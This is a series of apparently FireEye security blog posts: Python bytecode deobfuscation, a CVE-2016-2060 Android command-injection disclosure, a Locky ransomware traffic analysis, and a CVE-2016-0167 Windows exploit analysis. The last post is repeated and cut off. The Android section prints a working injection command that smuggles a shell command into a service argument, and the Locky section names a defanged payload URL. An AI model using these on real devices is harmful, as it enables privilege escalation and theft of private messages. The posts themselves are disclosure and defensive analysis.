These unnecessary code sequences prevent decompiling bytecode using modules such as meta and uncompyle2. Many of the ROT_TWO and ROT_THREE sequences operate on an empty stack, which generates errors when inspected because both modules use a Python List object to simulate the runtime stack. A pop operation on the empty list generates exceptions that halt the decompilation process. In contrast, when the Python interpreter executes the bytecode, no checks are made on the stack before performing operations on it. Take for example ROT_TWO from ceval.c in Figure 4.

Figure 4: ROT_TWO source

Looking at the macro definitions for TOP, SECOND, SET_TOP and SET_SECOND from ceval.c in Figure 5, the lack of sanity checks allows these code sequences to execute without stopping.

Figure 5: Macro definitions

The NOPs and LOAD_CONST/POP_TOP sequences stop the decompilation process in situations where the next or previous instructions are expected to be a specific value. An example debug trace for uncompyle2 is shown in Figure 6 where the previous instruction is expected to be a jump or a return.

Removing the obfuscation

Now that the types of obfuscation have been identified, the next step is to clean the bytecode in hopes of getting a successful decompile. The opmap dictionary from the dis module is very helpful when manipulating bytecode streams. When using opmap, instructions can be referenced by name rather than by numeric value. For example, the binary value of the NOP opcode is available as dis.opmap['NOP'].
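A minimal sketch of that replacement pass on a raw bytecode stream follows. Two assumptions to note: it uses the 3.6+ "wordcode" format (two bytes per instruction) for brevity, whereas the sample itself was Python 2 bytecode with variable-width instructions, and only the LOAD_CONST/POP_TOP case is shown since ROT_TWO/ROT_THREE no longer exist in recent CPython releases.

```python
import dis

NOP = dis.opmap["NOP"]
LOAD_CONST = dis.opmap["LOAD_CONST"]
POP_TOP = dis.opmap["POP_TOP"]

def nop_load_pop_pairs(code: bytes) -> bytes:
    """Overwrite LOAD_CONST/POP_TOP pairs with NOPs.

    Replacing in place keeps every offset stable, so jump targets do
    not need refactoring at this stage (removal comes later).
    """
    out = bytearray(code)
    for i in range(0, len(out) - 2, 2):
        if out[i] == LOAD_CONST and out[i + 2] == POP_TOP:
            out[i] = out[i + 2] = NOP
            out[i + 1] = out[i + 3] = 0  # zero the now-unused arguments
    return bytes(out)
```

Appendix B applies the same idea, additionally covering the rotation sequences, before rebuilding the code object.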

Appendix B contains an example script that replaces the ROT_TWO, ROT_THREE and LOAD_CONST/POP_TOP sequences with NOP instructions and creates a new code object. The disassembly produced from running the script in Appendix A on the malware is shown in Figure 6.

Figure 6: Clean disassembly

At this point, the disassembly is somewhat easier to read with the unnecessary instruction sequences replaced with NOPs, but the bytecode still fails to decompile. The failure is due to how uncompyle2 and meta deal with exceptions. The problem is demonstrated in Figure 7 with a simple script that includes an exception handler.

Figure 7: Exception handler

In Figure 7, the exception handler is created using the SETUP_EXCEPT instruction at offset 0, with the handler code beginning at offset 13 with the three POP_TOP instructions. Both the meta and uncompyle2 modules inspect the instruction prior to the exception handler to verify it is a jump instruction. If the instruction isn't a jump, the decompile process is halted. In the case of this malware, that instruction is a NOP left behind when the obfuscation sequences were replaced.

At this point, to get a successful decompile, we have two options. First, we can reorder instructions to make sure they are where the decompiler expects them. Alternatively, we can remove all the NOP instructions. Both strategies can be complicated and tedious because absolute and relative addresses for any jump instructions also need to be updated. This is where the bytecode_graph module comes in. Using the bytecode_graph module, it's easy to replace and remove instructions from a bytecode stream and generate a new stream with offsets automatically updated accordingly. Figure 8 shows an example function that uses the bytecode_graph module to remove all NOP instructions from a code object.

Figure 8: Example bytecode_graph removing NOP instructions
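The offset-refactoring problem that bytecode_graph solves can be illustrated with a toy model. To be clear, this is not the bytecode_graph API: jump arguments here hold the index of the target instruction, sidestepping real CPython's byte offsets and variable-width encodings.

```python
def remove_nops(instrs, jump_ops=frozenset({"JUMP_ABSOLUTE"})):
    """Drop NOPs from a list of (opname, arg) pairs and refactor
    jump targets so they still point at the same instructions."""
    # For each position, count how many NOPs appear strictly before it
    removed_before = []
    removed = 0
    for name, _ in instrs:
        removed_before.append(removed)
        if name == "NOP":
            removed += 1
    out = []
    for name, arg in instrs:
        if name == "NOP":
            continue
        if name in jump_ops:
            arg -= removed_before[arg]  # shift target left past removed NOPs
        out.append((name, arg))
    return out
```

A jump whose target was itself a NOP ends up pointing at the instruction that followed it, which matches the interpreter's fall-through behavior.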

Summary

In this blog I’ve demonstrated how to remove a simple obfuscation from a Python code object using the bytecode_graph module. I think you’ll find it easy to use and a perfect tool for dealing with tricky py2exe samples. You can download bytecode_graph via pip (pip install bytecode-graph) or from the FLARE team’s Github page: https://github.com/fireeye/flare-bytecode_graph.

An example script that removes the obfuscation discussed in this blog can be found here: https://github.com/fireeye/flare-bytecode_graph/blob/master/examples/bytecode_deobf_blog.py.

Hashes identified that implement this bytecode obfuscation:

        61a9f80612d3f7566db5bdf37bbf22cf
        ff720db99531767907c943b62d39c06d
        aad6c679b7046e568d6591ab2bc76360
        ba7d3868cb7350fddb903c7f5f07af85

Appendix A: Python script to extract and disassemble Py2exe resource

Appendix B: Sample script to remove obfuscation

Exploiting CVE-2016-2060 on Qualcomm Devices

Mandiant’s Red Team recently discovered a widespread vulnerability affecting Android devices that permits local privilege escalation to the built-in user “radio”, making it so an attacker can potentially perform activities such as viewing the victim’s SMS database and phone history. The vulnerability exists in a software package maintained by Qualcomm that is available from the Code Aurora Forum. It is published as CVE-2016-2060 and security advisory QCIR-2016-00001-1 on the Code Aurora Forum. We have provided general details in an FAQ, and a technical analysis of the vulnerability follows.

FAQ

What is CVE-2016-2060?

CVE-2016-2060 stems from a lack of input sanitization of the "interface" parameter of the "netd" daemon, a daemon that is part of the Android Open Source Project (AOSP). The vulnerability was introduced when Qualcomm modified the "netd" daemon and provided new APIs as part of the "network_manager" system service that allow additional tethering capabilities, possibly among other things.

How many devices are affected?

There is no solid answer. Since many flagship and non-flagship devices use Qualcomm chips and/or Qualcomm code, it is possible that hundreds of models are affected across the last five years. To put the timeline in perspective, Android Gingerbread (2.3.x) was released in 2011. This vulnerability was confirmed on devices running Lollipop (5.0), KitKat (4.4), and Jellybean MR2 (4.3), and the Git commit referenced in this post targets Ice Cream Sandwich MR1 (4.0.3).

How is the issue being addressed?

Qualcomm has addressed the issue by patching the "netd" daemon. Qualcomm notified their customers (all of the OEMs) in early March 2016. The OEMs will now need to provide updates for their devices; however, many devices will likely never be patched.

FireEye reached out to Qualcomm in January 2016 and subsequently worked with the Qualcomm Product Security Team to coordinate this blog release and security advisory. When contacted by FireEye, Qualcomm was extremely responsive throughout the entire process. They fixed the issue within 90 days – a window they set, not FireEye. FireEye would like to thank Qualcomm for their cooperation throughout the disclosure and diligence with addressing the issues.

Google has included this issue in its May 2016 Android Security Bulletin.

How would an attacker exploit this vulnerability?

There are two ways to exploit this vulnerability, though this does not account for a determined attacker who possesses additional vulnerabilities. The first is to have physical access to an unlocked device, and the second is to have a user install a malicious application on the device.

Any application could interact with this API without triggering any alerts. Google Play will likely not flag it as malicious, and it is unlikely that any antivirus would flag this threat. Additionally, the permission required to perform this is requested by millions of applications, so it wouldn't tip the user off that something is wrong.

What could an attacker do if they successfully exploit this vulnerability?

On older devices, the malicious application can extract the SMS database and phone call database, access the Internet, and perform any other capabilities allowed by the "radio" user. Some examples of potential capabilities of the "radio" user are presented in the blog itself, though it was difficult for all of these to be tested.

Newer devices are affected less. The malicious application can modify additional system properties maintained by the operating system. The impact here depends entirely on how the OEM is using the system property subsystem.

It should be noted that once the vulnerability is exploited, there is no indication to the user that something has happened. For example, there is no performance impact or risk of crashing the device.

Are only Android devices affected?

Since this is an open-source software package developed and made freely available by Qualcomm, people are using the code for a variety of projects, including Cyanogenmod (a fork of Android). The vulnerable APIs have been observed in a Git repository from 2011, indicating that someone was using this code at that time. This will make it particularly difficult to patch all affected devices, if not impossible.

Is this vulnerability being actively targeted or exploited?

No. The MTP team is monitoring usage of this API, but has not discovered anything.

Are FireEye customers protected?

FireEye MTP customers will be able to detect attempted exploitation of this vulnerability.

Technical Analysis

Next we will dive more deeply into CVE-2016-2060 and demonstrate how an attacker can exploit the vulnerability, but first an introduction to Android system services.

Understanding System Services

A system service is similar to a regular bound service found in an Android application, but a system service typically runs in a privileged process, such as the “mediaserver” or “system_server”. These services are the core of Android, and there are currently 99 system services registered on a default emulator build for Android Marshmallow. When USB debugging is enabled on a device, the `service` utility can be used to list system services registered on the device, shown in Figure 1.

Figure 1: Listing system services using 'service' utility

To illustrate how system services play a role on Android devices, we walk through the process of sending a text message (SMS) from an Android application. Figure 2 shows a Java snippet that can be used to send an SMS message with the content of “Test” to the number 1234567890:

        SmsManager smsManager = SmsManager.getDefault();
        smsManager.sendTextMessage(“1234567890”, null, “Test”, null, null);

Figure 2: Sending an SMS message from an application (from StackOverflow)

The code first obtains the SmsManager object associated with the default subscription ID using the static method “getDefault()”, and then calls the method “sendTextMessage(..)” with the appropriate arguments. The SmsManager class contains other SMS-related methods such as “downloadMultimediaMessage(..)” and “sendMultipartTextMessage(..)”.

Next, we’ll look at the Java source for the “sendTextMessage(..)” method of the SmsManager class used previously. For simplicity, we view the source for the SmsManager class included as part of Android 4.4 (“KitKat”), shown in Figure 3.

Figure 3: Java source of “sendTextMessage(..)” method

This method performs two functions: it first performs basic argument checking and then attempts to interact with a system service called “isms”. The “getService(..)” method of the ServiceManager class is used to obtain an IBinder object, which is then cast to an ISms object by using the “asInterface(..)” method. At this point, methods can be called from the “isms” system service using the Binder interface, which in this case is the method “sendText(..)”. Note that use of the ServiceManager class is not available to application developers using the Android SDK. This indicates that the SmsManager class is merely a wrapper for the “isms” system service, and this particular pattern is consistent across many other APIs such as location and telephony.

Calling System Services Directly

While Google does not recommend bypassing their official APIs to interact with a system service directly, it is possible to do so. To do this in an application, a developer has to import and use non-standard APIs (namely the aforementioned ServiceManager class). As an alternative, the `service` utility mentioned earlier can be used from the command line. In order to utilize the `service` utility, we need to gather additional pieces of information: the transaction ID of the method we would like to call and information regarding the arguments.

Obtaining a Transaction ID

When creating a bound Service in an Android application, the first step is to define the service interface using the Android Interface Definition Language (AIDL). When an AIDL file is compiled by the `aidl` utility during the application build process, a unique identifier is stored for each method of the interface in the form of a static field of the “Stub” inner-class. Developers rely on the method names and not these transaction IDs, as they will change between API builds and across vendors.

To illustrate this for the previous SMS example, we investigate the class “com.android.internal.telephony.Isms.Stub”, which is typically found on a device in the system JAR file “/system/framework/framework.jar”. By disassembling this JAR, we can determine the transaction ID for the method “sendText()”, which is 0xb hexadecimal or 11 decimal on this device, shown in Figure 4.

Figure 4: Obtaining the transaction ID of the “sendText(..)” method

Determining Method Arguments

Now that we have the transaction ID, we need to determine how to interact with the method. If the system service of interest is public, like the "isms" service, the AIDL source can be reviewed. If it is not, the service implementation needs to be reversed in order to determine the purpose of each argument. If we disassemble the inner class "com.android.internal.telephony.Isms.Stub.Proxy" included in the aforementioned "framework.jar", we should be able to get an idea of what each of the arguments represents and determine the return type. Figure 5 shows the arguments and return value for the "sendText(..)" method.

Figure 5: Method prototype of “sendText(..)” method

In the screenshot above we see that the "sendText(..)" method takes six arguments, denoted by the "pn" notation, and returns void, as denoted by the trailing "V" in the method prototype.

Putting it All Together

Now we can use the `service` utility to interact with the “isms” service and call the “sendText(..)” method. Figure 6 shows the syntax for the `service` utility to call a system service’s method.

    service call service_name transaction_id [arguments]

Figure 6: 'service' utility syntax to call a service method

The 'service' utility accepts string, integer, and null value arguments, represented by “s16”, “i32”, and “null”, respectively. Note that for anything more complex, a Java application must be used. We can now call the “sendText(..)” method, which has the transaction ID of 11, of the “isms” system service to send a message, shown in Figure 7.

    adb shell service call isms 11 s16 "com.fake" s16 "1234567890" s16 "1234567890" s16 "Test" i32 0 i32 0

Figure 7: Invoking “sendText(..)” using 'service' utility

This command shown sends an SMS message with the content of “Test” to the number 1234567890, similar to the Java snippet in Figure 2.

Exploring CVE-2016-2060

Starting from the Top

Device manufacturers and other non-Android Open Source Project (AOSP) vendors add and modify system services on a regular basis. From an attacker's perspective, new or changed APIs in system services are a prime target. A researcher can enumerate these by comparing the static fields beginning with "TRANSACTION_" found within the "Stub" inner class of system services on a target device to those of the AOSP. During one such review, we discovered two methods added to the "network_management" system service called "addUpstreamV6Interface(..)" and "removeUpstreamV6Interface(..)", found in "android.os.INetworkManagementService.Stub", which is part of the system JAR "/system/framework/framework.jar". This is depicted in Figure 8 and Figure 9.

Figure 8: “addUpstreamV6Interface(..)” transaction ID 0x1e (30)

Figure 9: “removeUpstreamV6Interface(..)” transaction ID 0x1f (31)

The “addUpstreamV6Interface(..)” method accepts a single string argument, interface_value, and returns void. Viewing the disassembled method “addUpstreamV6Interface(..)” of the class “com.android.server.NetworkManagementService” found in the system JAR “/system/framework/services.jar” indicated that when called, the method passed interface_value to the native daemon “netd” by writing the string shown in Figure 10 to the UNIX socket “/dev/socket/netd”.

    tether interface add_upstream interface_value

Figure 10: Command sent to “netd” native daemon

From here, analysis of "/system/bin/netd" indicated that this daemon executed "/system/bin/radish" using the "execv(..)" function with the arguments depicted in Figure 11.

    /system/bin/radish –i interface_value –x -t

Figure 11: Arguments passed to “/system/bin/radish”

The “/system/bin/radish” executable then passed the interface_value to the `brctl` utility using the “system(..)” function, using the syntax depicted in Figure 12.

    brctl addif bridge0 interface_value

Figure 12: interface_value present in `brctl` command

It is at this point we witness the code execution capabilities of CVE-2016-2060: any value passed to the “addUpstreamV6Interface(..)” is ultimately passed to the “system()” function without being sanitized or validated. A trivial example of this can be achieved with the `service` command shown in Figure 13, which prints the output of the `id` command to the Android log buffers:

    adb shell 'service call network_management 30 s16 '\''fake; log -t radio_exe "`id`"'\'''

Figure 13: 'service' command to write the output of 'id' to Android log buffers

This command passes the interface_value of '\''fake; log -t radio_exe "`id`"'\''' to the “/system/bin/radish” executable, which calls the “system()” function with the string shown in Figure 14.

    brctl addif bridge0 fake; log -t radio_exe "`id`"

Figure 14: Command injection into `brctl` “system()” function
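The string-splicing flaw can be modeled in a few lines of Python. This is illustrative only, not Qualcomm's code: `build_cmd` mirrors the unsanitized interpolation performed before the "system()" call, while `build_cmd_quoted` shows the standard shell-quoting fix.

```python
import shlex

def build_cmd(interface_value):
    """Vulnerable pattern: the caller-controlled value is spliced
    directly into a string that is later handed to system()."""
    return f"brctl addif bridge0 {interface_value}"

def build_cmd_quoted(interface_value):
    """Safer pattern: quoting strips shell metacharacters (;, `, ")
    of their meaning, so the value stays a single argument."""
    return f"brctl addif bridge0 {shlex.quote(interface_value)}"
```

With the payload from Figure 13, `build_cmd` yields exactly the injected command line of Figure 14, while the quoted form passes the whole payload through as one inert argument.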

We can check the Android log buffers to capture the output of our injected commands using the `logcat` utility, shown in Figure 15.

Figure 15: Output of 'id' captured in the Android log buffers

The output of the `id` command indicates that we are running as the Linux UID 1001 (“radio”) and under the SEAndroid context of “netd”. Next, we explore how an attacker would take advantage of this vulnerability and what actions this permits the attacker.

Practical Exploitation

The most feasible way of exploiting CVE-2016-2060 is by creating a malicious application. A malicious application needs only to request access to the “ACCESS_NETWORK_STATE” permission, a widely requested permission. Figure 16 shows how the “addUpstreamV6Interface(..)” method can be used to inject the command 'id'.

Figure 16: Malicious application calling “addUpstreamV6Interface(..)”

Since the commands above are executed as the user “radio”, data owned by applications that are also running as “radio” are accessible to the malicious application. On stock Android devices, this includes the Phone application and the Telephony Providers application, both of which contain sensitive information. The “radio” user also inherits several system permissions not accessible to a third-party application. A short list includes:

  • WRITE_SETTINGS_SECURE – Change key system settings
  • BLUETOOTH_ADMIN – Discover and pair with Bluetooth devices
  • WRITE_APN_SETTINGS – Change APN settings
  • DISABLE_KEYGUARD – Disable the key guard (lock screen)

Whether or not an attacker can abuse these permissions depends on the specific model, and may not be possible across all devices.

SEAndroid Considerations

Beginning in Android 4.4 (“KitKat”), devices utilize Security Enhancements for Android™ (SEAndroid) and set enforcing mode by default. Devices running SEAndroid in this mode are not impacted as significantly as older devices. The “netd” context that the “/system/bin/radish” executable runs as does not have the ability to interact with other “radio” user application data, has limited filesystem write capabilities, and is typically limited in terms of application interactions. The “netd” context does have the ability to alter “system_prop” properties of the Android property subsystem, which includes the “service.”, “persist.sys.”, “persist.service.”, and “persist.security.” property keys. Depending on how a particular device manufacturer utilizes these properties, it is possible to further compromise a device by altering them.

Conclusions

CVE-2016-2060 has been present on devices since at least 2011 and likely affects hundreds of Android models around the world. This vulnerability allows a seemingly benign application to access sensitive user data including SMS and call history and the ability to perform potentially sensitive actions such as changing system settings or disabling the lock screen. Devices running Android 4.3 (“Jellybean MR2”) or older are the most affected by the vulnerability, and are likely to remain unpatched. Newer devices utilizing SEAndroid are still affected, but to a lesser extent.

FireEye would like to thank Qualcomm for both working diligently to address CVE-2016-2060 and for supporting the release of this blog post. For FireEye Mobile Threat Prevention (MTP) customers, FireEye has added detection of CVE-2016-2060 exploitation on devices as of writing this blog post.

Locky Gets Clever!

As discussed in an earlier FireEye blog, we have seen Locky ransomware rise to fame in recent months. Locky is aggressively distributed via a JavaScript-based downloader sent as an attachment in spam emails, and may have overshadowed the Dridex banking Trojan as the top spam contributor.

FireEye Labs recently observed a new development in the way this ransomware communicates with its control server. Recent samples of Locky are once again being delivered via “Invoice”-related email campaigns, as seen in Figure 1. When the user runs the attached JavaScript, it attempts to download and execute the Locky ransomware payload from hxxp://banketcentr.ru/v8usja.

Figure 1. Locky email campaigns

This new Locky variant was observed to be highly evasive in its network communication. It uses both symmetric and asymmetric encryption – unlike previous versions that use custom encoding – to communicate with its control server.

Technical Details of Encryption Mechanism

To start encrypting the victim files, Locky obtains a public key from the control server. The POST data before encryption appears as:

‘id=0FFB4B18DB56F448&act=getkey&affid=1&lang=en&corp=0&serv=0&os=Windows+7&sp=1&x64=1'

To encrypt the request, Locky performs the following actions:

PHASE 1: Generate AES keys and encrypt the plaintext request.

1. Generate a single random byte using the CryptGenRandom() API. This byte decides how many NULL bytes are added to the plaintext request before encryption.

2. Generate a random binary blob of size 32, again using the CryptGenRandom() API. These bytes serve a dual purpose, as they are used as the key for both AES encryption and HMAC hash calculation.

3. Append NULL bytes to the plaintext request depending on the random byte generated in step 1.

4. Encrypt the (plaintext request + NULL bytes) with AES using the random 32 bytes from step 2 as the key.

PHASE 2: Encrypt the generated AES keys.

5. Obtain a public key (RSA, 1024 bits) from a decoded binary blob embedded inside the binary.

6. Create a PUBLICKEYSTRUCT blob header, add the random bytes generated in step 2, and then call the CryptImportKey() API to create an RC2 key HANDLE that is used for HMAC calculation.

7. Calculate the HMAC of (plaintext request + NULL bytes) using the key generated in step 6.

8. Using the RSA public key from step 5, encrypt (32-byte AES key [step 2] + random byte [step 1] + HMAC [step 7]).

9. Combine the data from step 4 and step 8 and send it through the POST request. See Figure 2 for an example of the POST request and Figure 3 for the format of the encrypted POST data.

Figure 2. Example POST request

Figure 3. POST data encryption overview
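The pre-encryption bookkeeping in phases 1 and 2 can be sketched with the standard library alone. The AES and RSA operations themselves require a crypto library and are represented only by the buffers that would feed them; the HMAC digest algorithm (MD5 here) is an assumption for illustration, as the Windows API path Locky uses does not name one in this analysis.

```python
import os
import hmac
import hashlib

def prepare_request(plaintext: bytes):
    """Sketch of Locky's request preparation (steps 1-3, 7, and the
    input to step 8). AES/RSA encryption itself is omitted."""
    pad_len = os.urandom(1)[0]              # step 1: one random byte
    key = os.urandom(32)                    # step 2: dual-use AES/HMAC key
    padded = plaintext + b"\x00" * pad_len  # step 3: NULL padding
    mac = hmac.new(key, padded, hashlib.md5).digest()  # step 7 (alg assumed)
    # Step 8 would RSA-encrypt this concatenation with the embedded public key
    rsa_input = key + bytes([pad_len]) + mac
    return padded, rsa_input
```

`padded` would then be AES-encrypted under `key` (step 4) and concatenated with the RSA-encrypted `rsa_input` to form the POST body of Figure 3.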

Interestingly, this Locky variant uses the AES-NI extended instruction set – as opposed to software implementation – to generate the encryption round keys and encrypt the text.

AES Round Keys Generation

Locky uses the opcode instruction aeskeygenassist for AES round key generation, as seen in Figure 4.

Figure 4. AES round keys generation from the primary key

AES Encryption Rounds

A total of 14 encryption rounds are used to encrypt the plaintext, which corresponds to a 256-bit key. Each round is carried out by the aesenc instruction and the last round by aesenclast, as seen in Figure 5.

Figure 5. AES encryption using the AESENC and AESENCLAST hardware instructions
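The inference from round count to key size follows the fixed schedule in FIPS-197, which ties each AES key length to a specific number of rounds:

```python
# FIPS-197: the AES round count is fixed by the key size
AES_ROUNDS = {128: 10, 192: 12, 256: 14}

def key_bits_for_rounds(rounds: int) -> int:
    """Invert the table: observing 14 rounds implies a 256-bit key."""
    return {v: k for k, v in AES_ROUNDS.items()}[rounds]
```

This is why counting the aesenc/aesenclast iterations in the disassembly is enough to conclude the sample uses AES-256.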

Conclusion

Crimeware authors are constantly improving their malware. In this case, we see them evolving to protect their malware while maximizing its infection potential. Locky has moved from using simple encoding to obfuscate its network traffic to a complex encryption algorithm using hardware instructions that are very hard to crack.

These types of advancements highlight the importance of remaining vigilant against suspicious emails and using advanced technologies to prevent infections.

IoCs

MD5s:

  • Zip downloader 638f70d173f10b2e8c9313fe20d6a440
  • Locky e4c51f20d07fc010a425e392d2acae16

Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks

In March 2016, a financially motivated threat actor launched several tailored spear phishing campaigns primarily targeting the retail, restaurant, and hospitality industries. The emails contained variations of Microsoft Word documents with embedded macros that, when enabled, downloaded and executed a malicious downloader that we refer to as PUNCHBUGGY.

PUNCHBUGGY is a dynamic-link library (DLL) downloader, existing in both 32-bit and 64-bit versions, that can obtain additional code over HTTPS. This downloader was used by the threat actor to interact with compromised systems and move laterally across victim environments.

FireEye identified more than 100 organizations in North America that fell victim to this campaign. FireEye investigated a number of these breaches and observed that the threat actor had access to relatively sophisticated tools including a previously unknown elevation of privilege (EoP) exploit and a previously unnamed point of sale (POS) memory scraping tool that we refer to as PUNCHTRACK. 

CVE-2016-0167 – Microsoft Windows Zero-Day Local Privilege Escalation

In some victim environments, the threat actor exploited a previously unknown elevation of privilege (EoP) vulnerability in Microsoft Windows to selectively gain SYSTEM privileges on a limited number of compromised machines (Figure 1).

Figure 1. CVE-2016-0167 Local privilege escalation exploit elevates to system

We coordinated with Microsoft, who patched CVE-2016-0167 on the April 12, 2016, Patch Tuesday (MS16-039). Working together, we were able to observe limited, targeted use of this particular exploit dating back to March 8, 2016.

The Threat Actor

We attribute the use of this EoP to a financially motivated threat actor. In the past year, not only have we observed this group using similar infrastructure and techniques, tactics, and procedures (TTPs), but they are also the only group we have observed to date who uses the downloader PUNCHBUGGY and POS malware PUNCHTRACK. Designed to scrape both Track 1 and Track 2 payment card data, PUNCHTRACK is loaded and executed by a highly obfuscated launcher and is never saved to disk.

This actor has conducted operations on a large scale and at a rapid pace, displaying a level of operational awareness and ability to adapt their operations on the fly. These abilities, combined with targeted usage of an EoP exploit and the reconnaissance required to individually tailor phishing emails to victims, potentially speaks to the threat actors’ operational maturity and sophistication.

Exploitation Details

Win32k!xxxMNDestroyHandler Use-After-Free

CVE-2016-0167 is a local elevation of privilege vulnerability in the win32k Windows Graphics subsystem. An attacker who had already achieved remote code execution (RCE) could exploit this vulnerability to elevate privileges. In the attack from the wild, attackers first achieved RCE with malicious macros in documents attached to spear phishing emails. They then downloaded and ran a CVE-2016-0167 exploit to run subsequent code as SYSTEM.

CVE-2016-0167 is patched as of April 12, 2016, meaning the attacker’s EoP exploit will no longer function on fully updated systems. Microsoft released an additional update (MS16-062) on May 10, 2016, to further improve Windows against similar issues.

Vulnerability Setup

First, the exploit calls CreateWindowEx() to create a main window. It sets the WNDCLASSEX.lpfnWndProc field to a function that we name WndProc. It installs an application-defined hook (that we name MessageHandler) and an event hook (that we name EventHandler) using SetWindowsHookEx() and SetWinEventHook(), respectively.

Next, it creates a timer with IDEvent 0x5678 in SetTimer(). When the timeout occurs, WndProc receives the WM_TIMER message and will invoke TrackPopupMenuEx() to display a shortcut menu. EventHandler will capture the EVENT_SYSTEM_MENUPOPUPSTART event from xxxTrackPopupMenuEx() and post a message to the kernel. In handling the message, the kernel eventually calls the vulnerable function xxxMNDestroyHandler(), which calls the usermode callback MessageHandler. MessageHandler then causes a use-after-free scenario by calling DestroyWindow().

Heap Control

The exploit uses SetSysColors() to perform heap Feng Shui, which manipulates the layout of the heap by carefully making heap allocations. In the following snippet, one of the important fields is at address fffff900`c1aaac40, where fffff900`c06a0422 is a window kernel object’s (tagWND) base address plus 0x22:

Memory Corruption

The USE operation occurs at HMAssignmentUnlock()+0x14 as shown below:

Since RDX contains the base address of tagWND plus 0x22, this instruction will add 0xffffffff to the win32k!tagWND.state field, changing its value from 0x07004000 to 0x07003fff. 0x07004000 indicates that the bServerSideWindowProc flag is unset. When the change occurs, it sets the bServerSideWindowProc flag as shown below.

Code Execution

If a window is marked as server-side (bServerSideWindowProc is set), the lpfnWndProc function pointer will be trusted by default and can point to user-mode shellcode. The following backtrace shows the kernel calling the exploit’s shellcode:

The shellcode then steals the System process token to elevate a child cmd.exe process.

Mitigation

FireEye products and services identify this activity as Exploit.doc.MVX, Malware.Binary.Doc, PUNCHBUGGY, Malware.Binary.exe, and PUNCHTRACK within the user interfaces.

The latest Windows updates address CVE-2016-0167, and fully protect systems from exploits targeting CVE-2016-0167.

In addition, effective mitigations exist to prevent social engineering attacks that utilize Office macros. Individual users can disable Office macros in their settings and enterprise administrators can enforce a Group Policy to control macro execution for all Office 2016 users. More details about Office macro attacks and mitigations are available here.

Acknowledgements

Thank you to Elia Florio and the Secure@ staff of Microsoft, and Dimiter Andonov, Erye Hernandez, Nick Richard, and Ryann Winters of FireEye for their collaboration on this issue.

Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks

In March 2016, a financially motivated threat actor launched several tailored spear phishing campaigns primarily targeting the retail, restaurant, and hospitality industries. The emails contained variations of Microsoft Word documents with embedded macros that, when enabled, downloaded and executed a malicious downloader that we refer to as PUNCHBUGGY.

PUNCHBUGGY is a dynamic-link library (DLL) downloader, existing in both 32-bit and 64-bit versions, that can obtain additional code over HTTPS. This downloader was used by the threat actor to interact with compromised systems and move laterally across victim environments.

FireEye identified more than 100 organizations in North America that fell victim to this campaign. FireEye investigated a number of these breaches and observed that the threat actor had access to relatively sophisticated tools including a previously unknown elevation of privilege (EoP) exploit and a previously unnamed point of sale (POS) memory scraping tool that we refer to as PUNCHTRACK. 

CVE-2016-0167 – Microsoft Windows Zero-Day Local Privilege Escalation

In some victim environments, the threat actor exploited a previously unknown elevation of privilege (EoP) vulnerability in Microsoft Windows to selectively gain SYSTEM privileges on a limited number of compromised machines (Figure 1).

Figure 1. CVE-2016-0167 Local privilege escalation exploit elevates to system

We coordinated with Microsoft, who patched CVE-2016-0167 on the April 12, 2016, Patch Tuesday (MS16-039). Working together, we were able to observe limited, targeted use of this particular exploit dating back to March 8, 2016.

The Threat Actor

We attribute the use of this EoP to a financially motivated threat actor. In the past year, not only have we observed this group using similar infrastructure and techniques, tactics, and procedures (TTPs), but they are also the only group we have observed to date who uses the downloader PUNCHBUGGY and POS malware PUNCHTRACK. Designed to scrape both Track 1 and Track 2 payment card data, PUNCHTRACK is loaded and executed by a highly obfuscated launcher and is never saved to disk.

This actor has conducted operations on a large scale and at a rapid pace, displaying a level of operational awareness and ability to adapt their operations on the fly. These abilities, combined with targeted usage of an EoP exploit and the reconnaissance required to individually tailor phishing emails to victims, potentially speaks to the threat actors’ operational maturity and sophistication.

Exploitation Details

Win32k!xxxMNDestroyHandler Use-After-Free

CVE-2016-0167 is a local elevation of privilege vulnerability in the win32k Windows Graphics subsystem. An attacker who had already achieved remote code execution (RCE) could exploit this vulnerability to elevate privileges. In the attacks observed in the wild, attackers first achieved RCE with malicious macros in documents attached to spear phishing emails. They then downloaded and ran a CVE-2016-0167 exploit to run subsequent code as SYSTEM.

CVE-2016-0167 is patched as of April 12, 2016, meaning the attacker’s EoP exploit will no longer function on fully updated systems. Microsoft released an additional update (MS16-062) on May 10, 2016, to further improve Windows against similar issues.

Vulnerability Setup

First, the exploit calls CreateWindowEx() to create a main window. It sets the WNDCLASSEX.lpfnWndProc field to a function that we name WndProc. It installs an application-defined hook (that we name MessageHandler) and an event hook (that we name EventHandler) using SetWindowsHookEx() and SetWinEventHook(), respectively.

Next, it creates a timer with IDEvent 0x5678 in SetTimer(). When the timeout occurs, WndProc receives the WM_TIMER message and will invoke TrackPopupMenuEx() to display a shortcut menu. EventHandler will capture the EVENT_SYSTEM_MENUPOPUPSTART event from xxxTrackPopupMenuEx() and post a message to the kernel. In handling the message, the kernel eventually calls the vulnerable function xxxMNDestroyHandler(), which calls the usermode callback MessageHandler. MessageHandler then causes a use-after-free scenario by calling DestroyWindow().

Heap Control

The exploit uses SetSysColors() to perform heap feng shui, which manipulates the layout of the heap by carefully making heap allocations. In the following snippet, one of the important fields is at address fffff900`c1aaac40, where fffff900`c06a0422 is a window kernel object’s (tagWND) base address plus 0x22:

Memory Corruption

The USE operation occurs at HMAssignmentUnlock()+0x14 as shown below:

Since RDX contains the base address of tagWND plus 0x22, this instruction will add 0xffffffff to the win32k!tagWND.state field, changing its value from 0x07004000 to 0x07003fff. 0x07004000 indicates that the bServerSideWindowProc flag is unset. When the change occurs, it sets the bServerSideWindowProc flag as shown below.
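The arithmetic of that corruption is worth making explicit: adding 0xffffffff to a 32-bit field is a decrement with wraparound, and the borrow ripples through the low bits. A minimal sketch (the constants are from the text above; the helper name is ours):

```python
# Adding 0xffffffff to a 32-bit value is equivalent to subtracting 1,
# because the result is truncated to 32 bits (as the ADD instruction does).
def add32(value: int, addend: int) -> int:
    """32-bit addition with wraparound."""
    return (value + addend) & 0xFFFFFFFF

state_before = 0x07004000
state_after = add32(state_before, 0xFFFFFFFF)
assert state_after == 0x07003FFF

# The borrow clears bit 14 (0x4000) and sets every bit below it, so any
# flag stored in bits 0-13 of the state field flips from 0 to 1.
assert (state_after & ~state_before & 0xFFFFFFFF) == 0x3FFF
```

This is why a single off-by-one write suffices: the decrement's borrow turns on a whole run of low bits, one of which happens to be the flag the exploit needs.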

Code Execution

